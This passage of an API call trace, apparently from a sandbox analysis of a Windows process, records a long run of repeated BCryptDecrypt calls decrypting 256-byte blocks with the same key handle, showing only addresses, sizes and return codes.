cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203af97, pcbResult=0x14f8fc) returned 0x0 [0172.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.723] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e768d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203b08c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203b08c, pcbResult=0x14f8fc) returned 0x0 [0172.725] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.725] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e769d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203b181, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203b181, pcbResult=0x14f8fc) returned 0x0 [0172.726] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.727] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e76ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203b276, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203b276, pcbResult=0x14f8fc) returned 0x0 [0172.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.927] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e76bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203b36b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203b36b, pcbResult=0x14f8fc) returned 0x0 [0172.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.929] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e76cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203b460, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203b460, pcbResult=0x14f8fc) returned 0x0 [0172.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.930] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e76dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203b555, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203b555, pcbResult=0x14f8fc) returned 0x0 [0172.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.932] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e76ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203b64a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203b64a, pcbResult=0x14f8fc) returned 0x0 [0172.933] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.933] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e76fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203b73f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203b73f, pcbResult=0x14f8fc) returned 0x0 [0172.934] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.934] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e770d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203b834, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203b834, pcbResult=0x14f8fc) returned 0x0 [0172.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.936] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e771d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203b929, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203b929, pcbResult=0x14f8fc) returned 0x0 [0172.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.937] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e772d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203ba1e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203ba1e, pcbResult=0x14f8fc) returned 0x0 [0172.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.939] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e773d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203bb13, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203bb13, pcbResult=0x14f8fc) returned 0x0 [0172.940] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.940] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e774d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203bc08, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203bc08, pcbResult=0x14f8fc) returned 0x0 [0172.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.943] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e775d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203bcfd, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203bcfd, pcbResult=0x14f8fc) returned 0x0 [0172.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.945] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e776d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203bdf2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203bdf2, pcbResult=0x14f8fc) returned 0x0 [0172.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.946] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e777d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203bee7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203bee7, pcbResult=0x14f8fc) returned 0x0 [0172.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.948] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e778d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203bfdc, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203bfdc, pcbResult=0x14f8fc) returned 0x0 [0172.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.950] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e779d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203c0d1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203c0d1, pcbResult=0x14f8fc) returned 0x0 [0172.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.951] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e77ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203c1c6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203c1c6, pcbResult=0x14f8fc) returned 0x0 [0172.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.952] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e77bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203c2bb, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203c2bb, pcbResult=0x14f8fc) returned 0x0 [0172.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.954] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e77cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203c3b0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203c3b0, pcbResult=0x14f8fc) returned 0x0 [0172.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.955] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e77dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203c4a5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203c4a5, pcbResult=0x14f8fc) returned 0x0 [0172.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.957] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e77ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203c59a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203c59a, pcbResult=0x14f8fc) returned 0x0 [0172.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.958] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e77fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203c68f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203c68f, pcbResult=0x14f8fc) returned 0x0 [0172.959] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.959] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e780d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203c784, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203c784, pcbResult=0x14f8fc) returned 0x0 [0173.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.118] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e781d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203c879, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203c879, pcbResult=0x14f8fc) returned 0x0 [0173.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.119] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e782d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203c96e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203c96e, pcbResult=0x14f8fc) returned 0x0 [0173.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.120] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e783d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203ca63, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203ca63, pcbResult=0x14f8fc) returned 0x0 [0173.122] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.122] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e784d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203cb58, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203cb58, pcbResult=0x14f8fc) returned 0x0 [0173.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.123] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e785d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203cc4d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203cc4d, pcbResult=0x14f8fc) returned 0x0 [0173.125] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.125] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e786d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203cd42, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203cd42, pcbResult=0x14f8fc) returned 0x0 [0173.126] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.126] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e787d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203ce37, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203ce37, pcbResult=0x14f8fc) returned 0x0 [0173.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.127] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e788d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203cf2c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203cf2c, pcbResult=0x14f8fc) returned 0x0 [0173.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.128] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e789d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203d021, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203d021, pcbResult=0x14f8fc) returned 0x0 [0173.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.130] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e78ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203d116, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203d116, pcbResult=0x14f8fc) returned 0x0 [0173.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.131] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e78bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203d20b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203d20b, pcbResult=0x14f8fc) returned 0x0 [0173.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.133] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e78cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203d300, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203d300, pcbResult=0x14f8fc) returned 0x0 [0173.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.134] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e78dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203d3f5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203d3f5, pcbResult=0x14f8fc) returned 0x0 [0173.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.136] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e78ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203d4ea, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203d4ea, pcbResult=0x14f8fc) returned 0x0 [0173.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.138] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e78fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203d5df, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203d5df, pcbResult=0x14f8fc) returned 0x0 [0173.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.139] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e790d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203d6d4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203d6d4, pcbResult=0x14f8fc) returned 0x0 [0173.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.140] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e791d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203d7c9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203d7c9, pcbResult=0x14f8fc) returned 0x0 [0173.142] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.142] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e792d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203d8be, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203d8be, pcbResult=0x14f8fc) returned 0x0 [0173.143] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.143] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e793d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203d9b3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203d9b3, pcbResult=0x14f8fc) returned 0x0 [0173.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.145] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e794d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203daa8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203daa8, pcbResult=0x14f8fc) returned 0x0 [0173.146] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.146] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e795d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203db9d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203db9d, pcbResult=0x14f8fc) returned 0x0 [0173.147] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.147] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e796d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203dc92, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203dc92, pcbResult=0x14f8fc) returned 0x0 [0173.149] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.149] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e797d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203dd87, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203dd87, pcbResult=0x14f8fc) returned 0x0 [0173.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.150] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e798d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203de7c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203de7c, pcbResult=0x14f8fc) returned 0x0 [0173.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.314] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e799d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203df71, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203df71, pcbResult=0x14f8fc) returned 0x0 [0173.316] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.316] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e79ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203e066, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203e066, pcbResult=0x14f8fc) returned 0x0 [0173.317] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.317] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e79bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203e15b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203e15b, pcbResult=0x14f8fc) returned 0x0 [0173.318] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.319] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e79cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203e250, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203e250, pcbResult=0x14f8fc) returned 0x0 [0173.320] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.320] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e79dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203e345, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203e345, pcbResult=0x14f8fc) returned 0x0 [0173.321] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.321] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e79ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203e43a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203e43a, pcbResult=0x14f8fc) returned 0x0 [0173.323] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.323] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e79fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203e52f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203e52f, pcbResult=0x14f8fc) returned 0x0 [0173.324] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.324] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7a0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203e624, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203e624, pcbResult=0x14f8fc) returned 0x0 [0173.326] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.326] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7a1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203e719, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203e719, pcbResult=0x14f8fc) returned 0x0 [0173.327] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.327] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7a2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203e80e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203e80e, pcbResult=0x14f8fc) returned 0x0 [0173.328] 